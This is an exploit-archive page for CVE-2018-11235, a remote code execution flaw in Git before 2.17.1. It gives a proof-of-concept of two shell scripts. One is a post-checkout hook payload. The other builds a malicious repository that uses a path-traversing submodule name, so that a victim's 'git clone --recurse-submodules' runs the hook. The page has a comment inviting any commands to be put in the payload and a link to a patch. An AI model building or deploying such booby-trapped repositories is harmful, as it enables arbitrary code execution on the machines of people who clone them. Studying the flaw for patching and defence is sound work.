Git < 2.17.1 Remote Code Execution

2018.06.01
Credit: JameelNabbo
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Git (code execution) # Date: 2018-05-29 # Exploit Author: JameelNabbo # Website: jameelnabbo.com <http://jameelnabbo.com/> # Vendor Homepage: https://github.com/git/git <https://github.com/git/git> # CVE: CVE-2018-11235 #Version: <=2.17.1 # Tested on Kali Linux P0C: Create two files: pwned.sh: the file which will contain our commands to be executed commit.sh the fole which contain a normal build with a bit of calls to our pwned.sh file add the follwing to Pwned.sh: #!/bin/sh cat << EOF #here we can put our lovely commands Exploited! : $(ifconfig) EOF #-------- Add the follwing to commit.sh file: #!/bin/sh set -e repo_dir="$PWD/repo" #change it to any other Repo repo_submodule='https://github.com/JameelNabbo/SmartWorm' git init "$repo_dir" cd "$repo_dir" git submodule add "$repo_submodule" pwned mkdir modules cp -r .git/modules/pwned modules cp ../pwned.sh modules/pwned/hooks/post-checkout git config -f .gitmodules submodule.pwned.update checkout git config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned git add modules git submodule add "$repo_submodule" git add SmartWorm git commit -am pwned echo "All done, now \`git clone --recurse-submodules \"$repo_dir\" dest_dir\`” —————— Solution: https://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top